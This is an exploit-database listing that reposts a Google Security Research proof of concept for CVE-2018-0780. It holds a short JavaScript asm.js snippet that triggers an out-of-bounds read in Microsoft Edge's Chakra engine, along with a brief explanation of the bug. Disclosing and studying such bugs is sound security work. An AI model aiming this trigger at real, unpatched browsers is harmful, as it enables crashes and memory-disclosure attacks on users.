[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Microsoft Edge Chakra - AsmJSByteCodeGenerator::EmitCall Out-of-Bounds Read Exploit

Author
Google Security Research
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-29572
Category
dos / poc
Date add
17-01-2018
CVE
CVE-2018-0780
Platform
windows
/*
AsmJSByteCodeGenerator::EmitCall which is used to emit call insturctions doesn't check if an array identifier is used as callee. The method handles those invalid calls in the same way it handles valid calls such as "arr[idx & ...]()". In these cases, the index register remains NoRegister which is (uint32_t)-1. It results in OOB read.
 
PoC:
*/
 
function Module() {
    'use asm';
    function f() {
        arr();
    }
 
    function g() {
    }
 
    var arr = [g];
    return f;
}
 
let f = Module();
f();

#  0day.today [2024-09-12]  #